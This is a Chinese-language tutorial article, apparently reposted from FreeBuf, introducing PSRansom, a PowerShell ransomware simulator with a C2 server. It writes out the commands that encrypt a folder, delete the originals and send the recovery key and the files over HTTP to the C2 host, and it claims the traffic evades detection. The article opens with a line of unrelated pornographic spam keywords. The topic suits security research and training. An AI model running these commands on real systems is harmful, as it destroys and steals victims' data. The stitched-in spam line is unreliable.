偷偷摘套内射激情视频,久久精品99国产国产精,中文字幕无线乱码人妻,中文在线中文a,性爽19p

如何使用PSRansom進行勒索軟件安全分析

安全
該工具可以幫助廣大研究人員模擬針對任何操作系統(tǒng)平臺的通用勒索軟件數(shù)據(jù)加密過程。

關(guān)于PSRansom

PSRansom是一款帶有C2服務(wù)器功能的PowerShell勒索軟件模擬工具,該工具可以幫助廣大研究人員模擬針對任何操作系統(tǒng)平臺(只要安裝了PowerShell即可)的通用勒索軟件數(shù)據(jù)加密過程。在C2服務(wù)器功能的幫助下,我們甚至還可以通過HTTP從目標設(shè)備(客戶端)中提取文件,并在服務(wù)器端接收信息。

客戶端和服務(wù)器端之間的通信數(shù)據(jù)都經(jīng)過了加密和編碼,因此是無法被基于流量審計的檢查工具所檢測到的。

工具要求

PowerShell 4.0或更高版本

工具下載

廣大研究人員可以使用下列命令將該項目源碼克隆至本地:git clone https://github.com/JoelGMSec/PSRansom

或者直接訪問該項目的【??Releases頁面??】下載工具的壓縮文件。

下載完成之后,我們將拿到兩個腳本:PSRansom和C2Server。第一個將模擬勒索軟件感染,而第二個將負責恢復文件及其恢復密鑰。

工具使用

該工具的使用非常簡單,我們只需要指明要加密的目錄、C2 服務(wù)器的 IP 或主機名以及接收連接的端口。

除此之外,如果我們需要發(fā)送加密文件,則需要在命令結(jié)尾添加-x參數(shù)選項即可。在解密的時候,只需要指明目錄和恢復密鑰即可。

工具使用樣例

首先,我們的測試場景定義如下:

  • 勒索軟件將在 Windows 機器上運行
  • 我們要加密的文件夾位于 C:\Backup
  • C2 服務(wù)器將在 Kali Linux 上運行
  • 所有流量都將通過代理查看詳細信息

接下來,我們看看該工具提供了哪些操作選項:

命令和控制服務(wù)器的使用也非常簡單,我們只需要指明監(jiān)聽連接的端口和接收連接的端口即可。這里,我們使用的是80端口:

pwsh C2Server.ps1 + 80

接下來,我們將使用以下命令運行加密和滲透:

.\PSRansom.ps1 -e directory -s ServerC2 -p port -x

此時將生成24 個字母數(shù)字字符(小寫、大寫和數(shù)字)的隨機密鑰,數(shù)據(jù)將以 AES256 加密,并將恢復密鑰發(fā)送到 C2 服務(wù)器。

完成后,原始文件將被刪除,僅保留加密的文件:

服務(wù)器端將接收到類似如下圖所示的內(nèi)容:

現(xiàn)在,我們將在服務(wù)器端接收到目標設(shè)備的信息、恢復密鑰、加密文件列表等:

許可證協(xié)議

本項目的開發(fā)與發(fā)布遵循??GPL-3.0??開源許可證協(xié)議。

項目地址

PSRansom:【??GitHub傳送門??】

責任編輯:趙寧寧 來源: FreeBuf.COM
相關(guān)推薦

2021-03-02 10:17:09

勒索軟件Nefilimr網(wǎng)絡(luò)安全

2023-03-24 12:14:42

2023-03-24 15:55:22

2021-03-04 11:02:07

勒索軟件Nefilim幽靈賬戶

2021-11-26 08:45:06

NetworKi網(wǎng)絡(luò)安全分析安全工具

2022-03-02 00:06:36

數(shù)據(jù)勒索軟件惡意軟件

2019-04-09 09:06:36

2021-11-04 05:43:38

GoKartGo代碼靜態(tài)安全分析

2021-11-01 11:51:24

勒索軟件惡意軟件安全

2020-12-02 13:28:56

勒索軟件漏洞網(wǎng)絡(luò)攻擊

2021-06-01 11:01:08

勒索軟件發(fā)展分析反勒索軟件日

2023-03-02 07:29:35

2022-01-26 23:12:42

Windows 10勒索軟件安全

2023-08-03 15:06:57

2022-07-05 13:49:38

勒索團伙QakBot銀行木馬

2022-09-27 14:46:03

網(wǎng)絡(luò)安全計算機惡意軟件

2020-04-15 15:28:24

Fireeye勒索軟件惡意軟件

2017-02-27 16:57:58

2019-12-26 13:29:50

勒索軟件攻擊黑客

2018-01-04 01:17:30

點贊
收藏

51CTO技術(shù)棧公眾號